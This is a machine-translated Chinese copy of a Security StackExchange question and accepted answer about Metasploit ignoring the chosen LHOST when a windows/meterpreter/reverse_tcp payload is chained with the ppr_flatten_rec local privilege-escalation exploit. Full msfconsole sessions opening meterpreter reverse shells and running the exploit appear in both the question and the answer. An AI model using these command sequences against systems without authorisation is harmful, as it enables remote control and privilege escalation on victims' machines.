使用错误LHOST地址的Metasploit
使用错误LHOST地址的Metasploit
提问于 2018-01-11 14:56:35
当我在Kali Linux滚动发布版中使用metasploit时,当我使用带有windows/ meterpreter /反向_tcp的开发/多/处理程序时,LHOST字段被自动转换为Wi接口IP,而实际上我想使用的是tap0,它是VPN接口。
我曾尝试解决以下问题:
set LHOST <tap0 IP>
setg LHOST <tap0 IP>
set INTERFACE tap0
setg INTERFACE tap0
set interface tap0
set interface tap0但是当使用run命令时,受害者试图连接到我的Wi,这显然是无法从VPN获得的。
无论何时更新Kali或metasploit,我已经有至少6个月的问题了。如果有人知道配置metasploit的正确方法,我很感激。
编辑:更多细节
问题的例子:
msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1 SESSION => 1 msf exploit(windows/local/ppr_flatten_rec) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(windows/local/ppr_flatten_rec) > run [*] Started reverse TCP handler on 192.168.85.158:4444
整个背景是:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.1:443
[*] Sending stage (179779 bytes) to 192.168.22.55
[*] Meterpreter session 1 opened (192.168.0.1:443 -> 192.168.22.55:49202) at 2018-01-10 23:27:30 -0500
meterpreter >
Background session 1? [y/N]
msf exploit(multi/handler) > use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
WAIT 10 yes Number of seconds to wait for exploit to run
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ppr_flatten_rec) > set LHOST **192.168.0.1**
LHOST => 192.168.0.1
msf exploit(windows/local/ppr_flatten_rec) > run
[*] Started reverse TCP handler on **192.168.85.158**:4444
[-] Exploit aborted due to failure: not-vulnerable: Exploit not available on this system.
[*] Exploit completed, but no session was created.
msf exploit(windows/local/ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
WAIT 10 yes Number of seconds to wait for exploit to run
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.85.158 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic回答 1
Security用户
回答已采纳
发布于 2018-01-11 21:46:37
我的问题的解决方案在Mukesh的评论中得到了解释(许多人感谢施罗德有时间帮助我更好地构造这个问题)。解决方案是在您要使用的每个本地漏洞之前再次使用set PAYLOAD。
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] Sending stage (847604 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.158:57772) at 2018-01-11 16:30:40 -0500
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ppr_flatten_rec
msf exploit(ppr_flatten_rec) > set PAYLOAD windows/meterpreter/reverse_tcp <------- [previously this was missing]
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
WAIT 10 yes Number of seconds to wait for exploit to run
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ppr_flatten_rec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ppr_flatten_rec) > set LPORT 4445
LPORT => 4445
msf exploit(ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
WAIT 10 yes Number of seconds to wait for exploit to run
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.1 yes The listen address
LPORT 4445 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(ppr_flatten_rec) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.1:4445 <----- [Now the IP is the correct one]页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://security.stackexchange.com/questions/177356
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号